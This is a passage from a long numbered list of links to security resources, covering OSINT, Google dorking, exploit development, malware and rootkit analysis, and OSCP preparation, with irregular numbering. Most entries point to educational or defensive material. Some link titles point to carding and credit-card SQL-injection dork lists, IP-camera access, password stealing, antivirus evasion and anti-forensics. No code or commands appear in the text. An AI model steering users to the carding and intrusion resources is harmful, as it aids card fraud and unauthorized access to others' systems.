https://cybertechies007.blogspot.com/.../using-google-as-hacking-tool-googledorks.ht...
-1010-#googledorks hashtag on Twitter:
https://twitter.com/hashtag/googledorks
-1011-Top Five Open Source Intelligence (OSINT) Tools:
https://resources.infosecinstitute.com/top-five-open-source-intelligence-osint-tools/
-1012-What is open-source intelligence (OSINT)?:
https://www.microfocus.com/en-us/what-is/open-source-intelligence-osint
-1013-A Guide to Open Source Intelligence Gathering (OSINT):
https://medium.com/bugbountywriteup/a-guide-to-open-source-intelligence-gathering-osint-ca831e13f29c
-1014-OSINT: How to find information on anyone:
https://medium.com/@Peter_UXer/osint-how-to-find-information-on-anyone-5029a3c7fd56
-1015-What is OSINT? How can I make use of it?:
https://securitytrails.com/blog/what-is-osint-how-can-i-make-use-of-it
-1016-OSINT Tools for the Dark Web:
https://jakecreps.com/2019/05/16/osint-tools-for-the-dark-web/
-1017-A Guide to Open Source Intelligence (OSINT):
https://www.cjr.org/tow_center_reports/guide-to-osint-and-hostile-communities.php
-1018-An Introduction To Open Source Intelligence (OSINT):
https://www.secjuice.com/introduction-to-open-source-intelligence-osint/
-1019-SSL & TLS HTTPS Testing [Definitive Guide] - Aptive:
https://www.aptive.co.uk/blog/tls-ssl-security-testing/
-1020-Exploit Title: [Files Containing E-mail and Associated Password Lists]:
https://www.exploit-db.com/ghdb/4262/?source=ghdbid
-1021-cheat_sheets:
http://zachgrace.com/cheat_sheets/
-1022-Intel SYSRET:
https://pentestlab.blog/2017/06/14/intel-sysret
-1023-Windows Preventive Maintenance Best Practices:
http://www.professormesser.com/free-a-plus-training/220-902/windows-preventive-maintenance-best-practices/
-1024-An Overview of Storage Devices:
http://www.professormesser.com/?p=19367
-1025-An Overview of RAID:
http://www.professormesser.com/?p=19373
-1026-How to Troubleshoot:
http://www.professormesser.com/free-a-plus-training/220-902/how-to-troubleshoot/
-1027-Mobile Device Security Troubleshooting:
http://www.professormesser.com/free-a-plus-training/220-902/mobile-device-security-troubleshooting/
-1028-Using Wireshark: Identifying Hosts and Users:
https://unit42.paloaltonetworks.com/using-wireshark-identifying-hosts-and-users/
-1029-Using Wireshark - Display Filter Expressions:
https://unit42.paloaltonetworks.com/using-wireshark-display-filter-expressions/
-1030-Decrypting SSL/TLS traffic with Wireshark:
https://resources.infosecinstitute.com/decrypting-ssl-tls-traffic-with-wireshark/
-1031-A collection of handy Bash One-Liners and terminal tricks for data processing and Linux system maintenance.:
https://onceupon.github.io/Bash-Oneliner/
-1032- Bash One-Liners Explained, Part I: Working with files :
https://catonmat.net/bash-one-liners-explained-part-one
-1033-Bash One-Liners Explained, Part IV: Working with history:
https://catonmat.net/bash-one-liners-explained-part-four
-1034-Useful bash one-liners :
https://github.com/stephenturner/oneliners
-1035-Some Random One-liner Linux Commands [Part 1]:
https://www.ostechnix.com/random-one-liner-linux-commands-part-1/
-1036-The best terminal one-liners from and for smart admins + devs.:
https://www.ssdnodes.com/tools/one-line-wise/
-1037-Shell one-liner:
https://rosettacode.org/wiki/Shell_one-liner#Racket
-1038-SSH Cheat Sheet:
http://pentestmonkey.net/tag/ssh
-1039-7000 Google Dork List:
https://pastebin.com/raw/Tdvi8vgK
-1040-GOOGLE HACKİNG DATABASE – GHDB:
https://pastebin.com/raw/1ndqG7aq
-1041-STEALING PASSWORD WITH GOOGLE HACK:
https://pastebin.com/raw/x6BNZ7NN
-1042-Hack Remote PC with PHP File using PhpSploit Stealth Post-Exploitation Framework:
http://www.hackingarticles.in/hack-remote-pc-with-php-file-using-phpsploit-stealth-post-exploitation-framework
-1043-Open Source database of android malware:
www.code.google.com/archive/p/androguard/wikis/DatabaseAndroidMalwares.wiki
-1044-big-list-of-naughty-strings:
https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt
-1045-publicly available cap files:
http://www.netresec.com/?page=PcapFiles
-1046-“Insertion, Evasion, and Denial of Service: Eluding Network Intrusion Detection”:
http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.119.399&rep=rep1&type=pdf
-1047-Building a malware analysis toolkit:
https://zeltser.com/build-malware-analysis-toolkit/
-1048-Netcat Reverse Shell Cheat Sheet:
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
-1049-Packers and crypters:
http://securityblog.gr/2950/detect-packers-cryptors-and-compilers/
-1050-Evading antivirus:
http://www.blackhillsinfosec.com/?p=5094
-1051-cheat sheets and information,The Art of Hacking:
https://github.com/The-Art-of-Hacking
-1052-Error-based SQL injection:
https://www.exploit-db.com/docs/37953.pdf
-1053-XSS cheat sheet:
https://www.veracode.com/security/xss
-1054-Active Directory Enumeration with PowerShell:
https://www.exploit-db.com/docs/46990
-1055-Buffer Overflows, C Programming, NSA GHIDRA and More:
https://www.exploit-db.com/docs/47032
-1056-Analysis of CVE-2019-0708 (BlueKeep):
https://www.exploit-db.com/docs/46947
-1057-Windows Privilege Escalations:
https://www.exploit-db.com/docs/46131
-1058-The Ultimate Guide For Subdomain Takeover with Practical:
https://www.exploit-db.com/docs/46415
-1059-File transfer skills in the red team post penetration test:
https://www.exploit-db.com/docs/46515
-1060-How To Exploit PHP Remotely To Bypass Filters & WAF Rules:
https://www.exploit-db.com/docs/46049
-1061-Flying under the radar:
https://www.exploit-db.com/docs/45898
-1062-what is google hacking? and why it is useful ?and how you can learn how to use it:
https://twitter.com/cry__pto/status/1142497470825545729?s=20
-1063-useful blogs for penetration testers:
https://twitter.com/cry__pto/status/1142497470825545729?s=20
-1064-useful #BugBounty resources & links & tutorials & explanations & writeups ::
https://twitter.com/cry__pto/status/1143965322233483265?s=20
-1065-Union- based SQL injection:
http://securityidiots.com/Web-Pentest/SQL-Injection/Basic-Union-Based-SQL-Injection.html
-1066-Broken access control:
https://www.happybearsoftware.com/quick-check-for-access-control-vulnerabilities-in-rails
-1067-Understanding firewall types and configurations:
http://searchsecurity.techtarget.com/feature/The-five-different-types-of-firewalls
-1068-5 Kali Linux tricks that you may not know:
https://pentester.land/tips-n-tricks/2018/11/09/5-kali-linux-tricks-that-you-may-not-know.html
-1069-5 tips to make the most of Twitter as a pentester or bug bounty hunter:
https://pentester.land/tips-n-tricks/2018/10/23/5-tips-to-make-the-most-of-twitter-as-a-pentester-or-bug-bounty-hunter.html
-1060-A Guide To Subdomain Takeovers:
https://www.hackerone.com/blog/Guide-Subdomain-Takeovers
-1061-Advanced Recon Automation (Subdomains) case 1:
https://medium.com/p/9ffc4baebf70
-1062-Security testing for REST API with w3af:
https://medium.com/quick-code/security-testing-for-rest-api-with-w3af-2c43b452e457?source=post_recirc---------0------------------
-1062-The Lazy Hacker:
https://securit.ie/blog/?p=86
-1063-Practical recon techniques for bug hunters & pen testers:
https://github.com/appsecco/practical-recon-levelup0x02/raw/200c43b58e9bf528a33c9dfa826fda89b229606c/practical_recon.md
-1064-A More Advanced Recon Automation #1 (Subdomains):
https://poc-server.com/blog/2019/01/18/advanced-recon-subdomains/
-1065-Expanding your scope (Recon automation #2):
https://poc-server.com/blog/2019/01/31/expanding-your-scope-recon-automation/
-1066-RCE by uploading a web.config:
https://poc-server.com/blog/2018/05/22/rce-by-uploading-a-web-config/
-1067-Finding and exploiting Blind XSS:
https://enciphers.com/finding-and-exploiting-blind-xss/
-1068-Google dorks list 2018:
http://conzu.de/en/google-dork-liste-2018-conzu
-1096-Out of Band Exploitation (OOB) CheatSheet:
https://www.notsosecure.com/oob-exploitation-cheatsheet/
-1070-Metasploit Cheat Sheet:
https://nitesculucian.github.io/2018/12/01/metasploit-cheat-sheet/
-1071-Linux Post Exploitation Cheat Sheet :
red-orbita.com/?p=8455
-1072-OSCP/Pen Testing Resources :
https://medium.com/@sdgeek/oscp-pen-testing-resources-271e9e570d45
-1073-Out Of Band Exploitation (OOB) CheatSheet :
https://packetstormsecurity.com/files/149290/Out-Of-Band-Exploitation-OOB-CheatSheet.html
-1074-HTML5 Security Cheatsheet:
https://html5sec.org/
-1075-Kali Linux Cheat Sheet for Penetration Testers:
https://www.blackmoreops.com/2016/12/20/kali-linux-cheat-sheet-for-penetration-testers/
-1076-Responder - CheatSheet:
https://www.ivoidwarranties.tech/posts/pentesting-tuts/responder/cheatsheet/
-1076-Windows Post-Exploitation Command List:
pentest.tonyng.net/windows-post-exploitation-command-list/
-1077-Transfer files (Post explotation) - CheatSheet
https://ironhackers.es/en/cheatsheet/transferir-archivos-post-explotacion-cheatsheet/
-1078-SQL Injection Cheat Sheet: MSSQL — GracefulSecurity:
https://www.gracefulsecurity.com/sql-injection-cheat-sheet-mssql/
-1079-OSCP useful resources and tools:
https://acknak.fr/en/articles/oscp-tools/
-1080-Penetration Testing 102 - Windows Privilege Escalation - Cheatsheet:
www.exumbraops.com/penetration-testing-102-windows-privilege-escalation-cheatsheet
-1081-Transferring files from Kali to Windows (post exploitation) :
https://blog.ropnop.com/transferring-files-from-kali-to-windows/
-1082-Hack Like a Pro: The Ultimate Command Cheat Sheet for Metasploit:
https://null-byte.wonderhowto.com/.../hack-like-pro-ultimate-command-cheat-sheet-f...
-1083-OSCP Goldmine (not clickbait):
0xc0ffee.io/blog/OSCP-Goldmine
-1084-Privilege escalation: Linux :
https://vulp3cula.gitbook.io/hackers-grimoire/post-exploitation/privesc-linux
-1085-Exploitation Tools Archives :
https://pentesttools.net/category/exploitationtools/
-1086-From Local File Inclusion to Remote Code Execution - Part 1:
https://outpost24.com/blog/from-local-file-inclusion-to-remote-code-execution-part-1
-1087-Basic Linux Privilege Escalation:
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
-1088-Title: Ultimate Directory Traversal & Path Traversal Cheat Sheet:
www.vulnerability-lab.com/resources/documents/587.txt
-1089-Binary Exploitation:
https://pwndevils.com/hacking/howtwohack.html
1090-A guide to Linux Privilege Escalation:
https://payatu.com/guide-linux-privilege-escalation/
-1091-Penetration Testing Tools Cheat Sheet :
https://news.ycombinator.com/item?id=11977304
-1092-List of Metasploit Commands - Cheatsheet:
https://thehacktoday.com/metasploit-commands/
-1093-A journey into Radare 2 – Part 2: Exploitation:
https://www.megabeets.net/a-journey-into-radare-2-part-2/
-1094-Remote Code Evaluation (Execution) Vulnerability:
https://www.netsparker.com/blog/web-security/remote-code-evaluation-execution/
-1095-Exploiting Python Code Injection in Web Applications:
https://www.securitynewspaper.com/.../exploiting-python-code-injection-web-applicat...
-1096-Shells · Total OSCP Guide:
https://sushant747.gitbooks.io/total-oscp-guide/reverse-shell.html
-1097-MongoDB Injection cheat sheet Archives:
https://blog.securelayer7.net/tag/mongodb-injection-cheat-sheet/
-1098-Basic Shellshock Exploitation:
https://blog.knapsy.com/blog/2014/10/07/basic-shellshock-exploitation/
-1099-Wireshark Tutorial and Tactical Cheat Sheet :
https://hackertarget.com/wireshark-tutorial-and-cheat-sheet/
-1100-Windows Command Line cheatsheet (part 2):
https://www.andreafortuna.org/2017/.../windows-command-line-cheatsheet-part-2-wm...
-1101-Detecting WMI exploitation:
www.irongeek.com/i.php?page=videos/derbycon8/track-3-03...exploitation...
1102-Metasploit Cheat Sheet - Hacking Land :
https://www.hacking.land/2019/02/metasploit-cheat-sheet.html
-1103-5 Practical Scenarios for XSS Attacks:
https://pentest-tools.com/blog/xss-attacks-practical-scenarios/
-1104-Ultimate gdb cheat sheet:
http://nadavclaudecohen.com/2017/10/10/ultimate-gdb-cheat-sheet/
-1105-Reverse Engineering Cheat Sheet:
https://www.scribd.com/doc/38163906/Reverse-Engineering-Cheat-Sheet
-1106-Reverse Engineering Cheat Sheet:
https://www.scribd.com/document/94575179/Reverse-Engineering-Cheat-Sheet
-1107-Reverse Engineering For Malware Analysis:
https://eforensicsmag.com/reverse_engi_cheatsheet/
-1108-Reverse-engineering Cheat Sheets :
https://www.cheatography.com/tag/reverse-engineering/
-1109-Shortcuts for Understanding Malicious Scripts:
https://www.linkedin.com/pulse/shortcuts-understanding-malicious-scripts-viviana-ross
-1110-WinDbg Malware Analysis Cheat Sheet :
https://oalabs.openanalysis.net/2019/02/18/windbg-for-malware-analysis/
-1111-Cheat Sheet for Malware Analysis:
https://www.andreafortuna.org/2016/08/16/cheat-sheet-for-malware-analysis/
-1112-Tips for Reverse-Engineering Malicious Code :
https://www.digitalmunition.me/tips-reverse-engineering-malicious-code-new-cheat-sheet
-1113-Cheatsheet for radare2 :
https://leungs.xyz/reversing/2018/04/16/radare2-cheatsheet.html
-1114-Reverse Engineering Cheat Sheets:
https://www.pinterest.com/pin/576390452300827323/
-1115-Reverse Engineering Resources-Beginners to intermediate Guide/Links:
https://medium.com/@vignesh4303/reverse-engineering-resources-beginners-to-intermediate-guide-links-f64c207505ed
-1116-Malware Resources :
https://www.professor.bike/malware-resources
-1117-Zero-day exploits: A cheat sheet for professionals:
https://www.techrepublic.com/article/zero-day-exploits-the-smart-persons-guide/
-1118-Getting cozy with exploit development:
https://0x00sec.org/t/getting-cozy-with-exploit-development/5311
-1119-appsec - Web Security Cheatsheet :
https://security.stackexchange.com/questions/2985/web-security-cheatsheet-todo-list
-1120-PEDA - Python Exploit Development Assistance For GDB:
https://www.pinterest.ru/pin/789044797190775841/
-1121-Exploit Development Introduction (part 1) :
https://www.cybrary.it/video/exploit-development-introduction-part-1/
-1122-Windows Exploit Development: A simple buffer overflow example:
https://medium.com/bugbountywriteup/windows-expliot-dev-101-e5311ac284a
-1123-Exploit Development-Everything You Need to Know:
https://null-byte.wonderhowto.com/how-to/exploit-development-everything-you-need-know-0167801/
-1124-Exploit Development :
https://0x00sec.org/c/exploit-development
-1125-Exploit Development - Infosec Resources:
https://resources.infosecinstitute.com/category/exploit-development/
-1126-Exploit Development :
https://www.reddit.com/r/ExploitDev/
-1127-A Study in Exploit Development - Part 1: Setup and Proof of Concept :
https://www.anitian.com/a-study-in-exploit-development-part-1-setup-and-proof-of-concept
-1128-Exploit Development for Beginners:
https://www.youtube.com/watch?v=tVDuuz60KKc
-1129-Introduction to Exploit Development:
https://www.fuzzysecurity.com/tutorials/expDev/1.html
-1130-Exploit Development And Reverse Engineering:
https://www.immunitysec.com/services/exploit-dev-reverse-engineering.html
-1131-wireless forensics:
https://www.sans.org/reading-room/whitepapers/wireless/80211-network-forensic-analysis-33023
-1132-fake AP Detection:
https://www.sans.org/reading-room/whitepapers/detection/detecting-preventing-rogue-devices-network-1866
-1133-In-Depth analysis of SamSam Ransomware:
https://www.crowdstrike.com/blog/an-in-depth-analysis-of-samsam-ransomware-and-boss-spider/
-1134-WannaCry ransomware:
https://www.endgame.com/blog/technical-blog/wcrywanacry-ransomware-technical-analysis
-1135-malware analysis:
https://www.sans.org/reading-room/whitepapers/malicious/paper/2103
-1136-Metasploit's detailed communication and protocol writeup:
https://www.exploit-db.com/docs/english/27935-metasploit---the-exploit-learning-tree.pdf
-1137-Metasploit's SSL-generation module::
https://github.com/rapid7/metasploit-framework/blob/76954957c740525cff2db5a60bcf936b4ee06c42/lib/rex/post/meterpreter/client.rb
-1139-Empire IOCs::
https://www.sans.org/reading-room/whitepapers/detection/disrupting-empire-identifying-powershell-empire-command-control-activity-38315
-1140-excellent free training on glow analysis:
http://opensecuritytraining.info/Flow.html
-1141-NetFlow using Silk:
https://tools.netsa.cert.org/silk/analysis-handbook.pdf
-1142-Deep Packet Inspection:
https://is.muni.cz/th/ql57c/dp-svoboda.pdf
-1143-Detecting Behavioral Personas with OSINT and Datasploit:
https://www.exploit-db.com/docs/45543
-1144-WordPress Penetration Testing using WPScan and MetaSploit:
https://www.exploit-db.com/docs/45556
-1145-Bulk SQL Injection using Burp-to-SQLMap:
https://www.exploit-db.com/docs/45428
-1146-XML External Entity Injection - Explanation and Exploitation:
https://www.exploit-db.com/docs/45374
-1147- Web Application Firewall (WAF) Evasion Techniques #3 (CloudFlare and ModSecurity OWASP CRS3):
https://www.exploit-db.com/docs/45368
-1148-File Upload Restrictions Bypass:
https://www.exploit-db.com/docs/45074
-1149-VLAN Hopping Attack:
https://www.exploit-db.com/docs/45050
-1150-Jigsaw Ransomware Analysis using Volatility:
https://medium.com/@0xINT3/jigsaw-ransomware-analysis-using-volatility-2047fc3d9be9
-1151-Ransomware early detection by the analysis of file sharing traffic:
https://www.sciencedirect.com/science/article/pii/S108480451830300X
-1152-Do You Think You Can Analyse Ransomware?:
https://medium.com/asecuritysite-when-bob-met-alice/do-you-think-you-can-analyse-ransomware-bbc813b95529
-1153-Analysis of LockerGoga Ransomware :
https://labsblog.f-secure.com/2019/03/27/analysis-of-lockergoga-ransomware/
-1154-Detection and Forensic Analysis of Ransomware Attacks :
https://www.netfort.com/assets/NetFort-Ransomware-White-Paper.pdf
-1155-Bad Rabbit Ransomware Technical Analysis:
https://logrhythm.com/blog/bad-rabbit-ransomware-technical-analysis/
-1156-NotPetya Ransomware analysis :
https://safe-cyberdefense.com/notpetya-ransomware-analysis/
-1157-Identifying WannaCry on Your Server Using Logs:
https://www.loggly.com/blog/identifying-wannacry-server-using-logs/
-1158-The past, present, and future of ransomware:
https://www.itproportal.com/features/the-past-present-and-future-of-ransomware/
-1159-The dynamic analysis of WannaCry ransomware :
https://ieeexplore.ieee.org/iel7/8318543/8323471/08323682.pdf
-1160-Malware Analysis: Ransomware - SlideShare:
https://www.slideshare.net/davidepiccardi/malware-analysis-ransomware
-1161-Article: Anatomy of ransomware malware: detection, analysis :
https://www.inderscience.com/info/inarticle.php?artid=84399
-1162-Tracking desktop ransomware payments :
https://www.blackhat.com/docs/us-17/wednesday/us-17-Invernizzi-Tracking-Ransomware-End-To-End.pdf
-1163-What is Ransomware? Defined, Explained, and Explored:
https://www.forcepoint.com/cyber-edu/ransomware
-1164-Detect and Recover from Ransomware Attacks:
https://www.indexengines.com/ransomware
-1165-Wingbird rootkit analysis:
https://artemonsecurity.blogspot.com/2017/01/wingbird-rootkit-analysis.html
-1166-Windows Kernel Rootkits: Techniques and Analysis:
https://www.offensivecon.org/trainings/2019/windows-kernel-rootkits-techniques-and-analysis.html
-1167-Rootkit: What is a Rootkit and How to Detect It :
https://www.veracode.com/security/rootkit
-1168-Dissecting Turla Rootkit Malware Using Dynamic Analysis:
https://www.lastline.com/.../dissecting-turla-rootkit-malware-using-dynamic-analysis/
-1169-Rootkits and Rootkit Detection (Windows Forensic Analysis) Part 2:
https://what-when-how.com/windows-forensic-analysis/rootkits-and-rootkit-detection-windows-forensic-analysis-part-2/
-1170-ZeroAccess – an advanced kernel mode rootkit :
https://www.botnetlegalnotice.com/ZeroAccess/files/Ex_12_Decl_Anselmi.pdf
-1171-Rootkit Analysis Identification Elimination:
https://acronyms.thefreedictionary.com/Rootkit+Analysis+Identification+Elimination
-1172-TDL3: The Rootkit of All Evil?:
static1.esetstatic.com/us/resources/white-papers/TDL3-Analysis.pdf
-1173-Avatar Rootkit: Dropper Analysis:
https://resources.infosecinstitute.com/avatar-rootkit-dropper-analysis-part-1/
-1174-Sality rootkit analysis:
https://www.prodefence.org/sality-rootkit-analysis/
-1175-RootKit Hook Analyzer:
https://www.resplendence.com/hookanalyzer/
-1176-Behavioral Analysis of Rootkit Malware:
https://isc.sans.edu/forums/diary/Behavioral+Analysis+of+Rootkit+Malware/1487/
-1177-Malware Memory Analysis of the IVYL Linux Rootkit:
https://apps.dtic.mil/docs/citations/AD1004349
-1178-Analysis of the KNARK rootkit :
https://linuxsecurity.com/news/intrusion-detection/analysis-of-the-knark-rootkit
-1179-32 Bit Windows Kernel Mode Rootkit Lab Setup with INetSim :
https://medium.com/@eaugusto/32-bit-windows-kernel-mode-rootkit-lab-setup-with-inetsim-e49c22e9fcd1
-1180-Ten Process Injection Techniques: A Technical Survey of Common and Trending Process Injection Techniques:
https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
-1181-Code & Process Injection - Red Teaming Experiments:
https://ired.team/offensive-security/code-injection-process-injection
-1182-What Malware Authors Don't want you to know:
https://www.blackhat.com/.../asia-17-KA-What-Malware-Authors-Don't-Want-You-To-Know
-1183-.NET Process Injection:
https://medium.com/@malcomvetter/net-process-injection-1a1af00359bc
-1184-Memory Injection like a Boss :
https://www.countercept.com/blog/memory-injection-like-a-boss/
-1185-Process injection - Malware style:
https://www.slideshare.net/demeester1/process-injection
-1186-Userland API Monitoring and Code Injection Detection:
https://0x00sec.org/t/userland-api-monitoring-and-code-injection-detection/5565
-1187-Unpacking Redaman Malware & Basics of Self-Injection Packers:
https://liveoverflow.com/unpacking-buhtrap-malware-basics-of-self-injection-packers-ft-oalabs-2/
-1188-Code injection on macOS:
https://knight.sc/malware/2019/03/15/code-injection-on-macos.html
-1189-(Shell)Code Injection In Linux Userland :
https://blog.sektor7.net/#!res/2018/pure-in-memory-linux.md
-1190-Code injection on Windows using Python:
https://www.andreafortuna.org/2018/08/06/code-injection-on-windows-using-python-a-simple-example/
-1191-What is Reflective DLL Injection and how can be detected?:
https://www.andreafortuna.org/cybersecurity/what-is-reflective-dll-injection-and-how-can-be-detected/
-1192-Windows Process Injection:
https://modexp.wordpress.com/2018/08/23/process-injection-propagate/
-1193-A+ cheat sheet:
https://www.slideshare.net/abnmi/a-cheat-sheet
-1194-A Bettercap Tutorial — From Installation to Mischief:
https://danielmiessler.com/study/bettercap/
-1195-Debugging Malware with WinDbg:
https://www.ixiacom.com/company/blog/debugging-malware-windbg
-1195-Malware analysis, my own list of tools and resources:
https://www.andreafortuna.org/2016/08/05/malware-analysis-my-own-list-of-tools-and-resources/
-1196-Getting Started with Reverse Engineering:
https://lospi.net/developing/software/.../assembly/2015/03/.../reversing-with-ida.html
-1197-Debugging malicious windows scriptlets with Google chrome:
https://medium.com/@0xamit/debugging-malicious-windows-scriptlets-with-google-chrome-c31ba409975c
-1198-Intro to Radare2 for Malware Analysis:
https://malwology.com/2018/11/30/intro-to-radare2-for-malware-analysis/
-1199-Intro to Malware Analysis and Reverse Engineering:
https://www.cybrary.it/course/malware-analysis/
-1200-Common Malware Persistence Mechanisms:
https://resources.infosecinstitute.com/common-malware-persistence-mechanisms/
-1201-Finding Registry Malware Persistence with RECmd:
https://digital-forensics.sans.org/blog/2019/05/07/malware-persistence-recmd
-1202-Windows Malware Persistence Mechanisms :
https://www.swordshield.com/blog/windows-malware-persistence-mechanisms/
-1203- persistence techniques:
https://www.andreafortuna.org/2017/07/06/malware-persistence-techniques/
-1204- Persistence Mechanism - an overview | ScienceDirect Topics:
https://www.sciencedirect.com/topics/computer-science/persistence-mechanism
-1205-Malware analysis for Linux:
https://www.sothis.tech/en/malware-analysis-for-linux-wirenet/
-1206-Linux Malware Persistence with Cron:
https://www.sandflysecurity.com/blog/linux-malware-persistence-with-cron/
-1207-What is advanced persistent threat (APT)? :
https://searchsecurity.techtarget.com/definition/advanced-persistent-threat-APT
-1208-Malware Analysis, Part 1: Understanding Code Obfuscation :
https://www.vadesecure.com/en/malware-analysis-understanding-code-obfuscation-techniques/
-1209-Top 6 Advanced Obfuscation Techniques:
https://sensorstechforum.com/advanced-obfuscation-techniques-malware/
-1210-Malware Obfuscation Techniques:
https://dl.acm.org/citation.cfm?id=1908903
-1211-How Hackers Hide Their Malware: Advanced Obfuscation:
https://www.darkreading.com/attacks-breaches/how-hackers-hide-their-malware-advanced-obfuscation/a/d-id/1329723
-1212-Malware obfuscation techniques: four simple examples:
https://www.andreafortuna.org/2016/10/13/malware-obfuscation-techniques-four-simple-examples/
-1213-Malware Monday: Obfuscation:
https://medium.com/@bromiley/malware-monday-obfuscation-f65239146db0
-1213-Challenge of Malware Analysis: Malware obfuscation Techniques:
https://www.ijiss.org/ijiss/index.php/ijiss/article/view/327
-1214-Static Malware Analysis - Infosec Resources:
https://resources.infosecinstitute.com/malware-analysis-basics-static-analysis/
-1215-Malware Basic Static Analysis:
https://medium.com/@jain.sm/malware-basic-static-analysis-cf19b4600725
-1216-Difference Between Static Malware Analysis and Dynamic Malware Analysis:
http://www.differencebetween.net/technology/difference-between-static-malware-analysis-and-dynamic-malware-analysis/
-1217-What is Malware Analysis | Different Tools for Malware Analysis:
https://blog.comodo.com/different-techniques-for-malware-analysis/
-1218-Detecting Malware Pre-execution with Static Analysis and Machine Learning:
https://www.sentinelone.com/blog/detecting-malware-pre-execution-static-analysis-machine-learning/
-1219-Limits of Static Analysis for Malware Detection:
https://ieeexplore.ieee.org/document/4413008
-1220-Kernel mode versus user mode:
https://blog.codinghorror.com/understanding-user-and-kernel-mode/
-1221-Understanding the ELF:
https://medium.com/@MrJamesFisher/understanding-the-elf-4bd60daac571
-1222-Windows Privilege Abuse: Auditing, Detection, and Defense:
https://medium.com/palantir/windows-privilege-abuse-auditing-detection-and-defense-3078a403d74e
-1223-First steps to volatile memory analysis:
https://medium.com/@zemelusa/first-steps-to-volatile-memory-analysis-dcbd4d2d56a1
-1224-Maliciously Mobile: A Brief History of Mobile Malware:
https://medium.com/threat-intel/mobile-malware-infosec-history-70f3fcaa61c8
-1225-Modern Binary Exploitation Writeups 0x01:
https://medium.com/bugbountywriteup/binary-exploitation-5fe810db3ed4
-1226-Exploit Development 01 — Terminology:
https://medium.com/@MKahsari/exploit-development-01-terminology-db8c19db80d5
-1227-Zero-day exploits: A cheat sheet for professionals:
https://www.techrepublic.com/article/zero-day-exploits-the-smart-persons-guide/
-1228-Best google hacking list on the net:
https://pastebin.com/x5LVJu9T
-1229-Google Hacking:
https://pastebin.com/6nsVK5Xi
-1230-OSCP links:
https://pastebin.com/AiYV80uQ
-1231-Pentesting 1 Information gathering:
https://pastebin.com/qLitw9eT
-1232-OSCP-Survival-Guide:
https://pastebin.com/kdc6th08
-1233-Googledork:
https://pastebin.com/qKwU37BK
-1234-Exploit DB:
https://pastebin.com/De4DNNKK
-1235-Dorks:
https://pastebin.com/cfVcqknA
-1236-GOOGLE HACKİNG DATABASE:
https://pastebin.com/1ndqG7aq
-1237-Carding Dorks 2019:
https://pastebin.com/Hqsxu6Nn
-1238-17k Carding Dorks 2019:
https://pastebin.com/fgdZxy74
-1239-CARDING DORKS 2019:
https://pastebin.com/Y7KvzZqg
-1240-sqli dork 2019:
https://pastebin.com/8gdeLYvU
-1241-Private Carding Dorks 2018:
https://pastebin.com/F0KxkMMD
-1242-20K dorks list fresh full carding 2018:
https://pastebin.com/LgCh0NRJ
-1243-8k Carding Dorks :):
https://pastebin.com/2bjBPiEm
-1244-8500 SQL DORKS:
https://pastebin.com/yeREBFzp
-1245-REAL CARDING DORKS:
https://pastebin.com/0kMhA0Gb
-1246-15k btc dorks:
https://pastebin.com/zbbBXSfG
-1247-Sqli dorks 2016-2017:
https://pastebin.com/7TQiMj3A
-1248-Here is kind of a tutorial on how to write google dorks.:
https://pastebin.com/hZCXrAFK
-1249-10k Private Fortnite Dorks:
https://pastebin.com/SF9UmG1Y
-1250-find login panel dorks:
https://pastebin.com/9FGUPqZc
-1251-Shell dorks:
https://pastebin.com/iZBFQ5yp
-1252-HQ PAID GAMING DORKS:
https://pastebin.com/vNYnyW09
-1253-10K HQ Shopping DORKS:
https://pastebin.com/HTP6rAt4
-1254-Exploit Dorks for Joomla,FCK and others 2015 Old but gold:
https://pastebin.com/ttxAJbdW
-1255-Gain access to unsecured IP cameras with these Google dorks:
https://pastebin.com/93aPbwwE
-1256-new fresh dorks:
https://pastebin.com/ZjdxBbNB
-1257-SQL DORKS FOR CC:
https://pastebin.com/ZQTHwk2S
-1258-Wordpress uploadify Dorks Priv8:
https://pastebin.com/XAGmHVUr
-1259-650 DORKS CC:
https://pastebin.com/xZHARTyz
-1260-3k Dorks Shopping:
https://pastebin.com/e1XiNa8M
-1261-DORKS 2018 :
https://pastebin.com/YAZkPJ0j
-1262-HQ FORTNITE DORKS LIST:
https://pastebin.com/rzhiNad8
-1263-HQ PAID DORKS MIXED GAMING LOL STEAM ..MUSIC SHOPING:
https://pastebin.com/VwVpAvj2
-1264-Camera dorks:
https://pastebin.com/fsARft2j
-1265-Admin Login Dorks:
https://pastebin.com/HWWNZCph
-1266-sql gov dorks:
https://pastebin.com/C8wqyNW8
-1267-10k hq gaming dorks:
https://pastebin.com/cDLN8edi
-1268-HQ SQLI Google Dorks For Shops/Amazon! Enjoy! :
https://pastebin.com/y59kK2h0
-1269-Dorks:
https://pastebin.com/PKvZYMAa
-1270-10k btc dorks:
https://pastebin.com/vRnxvbCu
-1271-7,000 Dorks for hacking into various sites:
https://pastebin.com/n8JVQv3X
-1272-List of information gathering search engines/tools etc:
https://pastebin.com/GTX9X5tF
-1273-FBOSINT:
https://pastebin.com/5KqnFS0B
-1274-Ultimate Penetration Testing:
https://pastebin.com/4EEeEnXe
-1275-massive list of information gathering search engines/tools :
https://pastebin.com/GZ9TVxzh
-1276-CEH Class:
https://pastebin.com/JZdCHrN4
-1277-CEH/CHFI Bundle Study Group Sessions:
https://pastebin.com/XTwksPK7
-1278-OSINT - Financial:
https://pastebin.com/LtxkUi0Y
-1279-Most Important Security Tools and Resources:
https://pastebin.com/cGE8rG04
-1280-OSINT resources from inteltechniques.com:
https://pastebin.com/Zbdz7wit
-1281-Red Team Tips:
https://pastebin.com/AZDBAr1m
-1282-OSCP Notes by Ash:
https://pastebin.com/wFWx3a7U
-1283-OSCP Prep:
https://pastebin.com/98JG5f2v
-1284-OSCP Review/Cheat Sheet:
https://pastebin.com/JMMM7t4f
-1285-OSCP Prep class:
https://pastebin.com/s59GPJrr
-1286-Complete Anti-Forensics Guide:
https://pastebin.com/6V6wZK0i
-1287-The Linux Command Line Cheat Sheet:
https://pastebin.com/PUtWDKX5
-1288-Command-Line Log Analysis:
https://pastebin.com/WEDwpcz9
-1289-An A-Z Index of the Apple macOS command line (OS X):
https://pastebin.com/RmPLQA5f
-1290-San Diego Exploit Development 2018:
https://pastebin.com/VfwhT8Yd
-1291-Windows Exploit Development Megaprimer:
https://pastebin.com/DvdEW4Az
-1292-Some Free Reverse engineering resources:
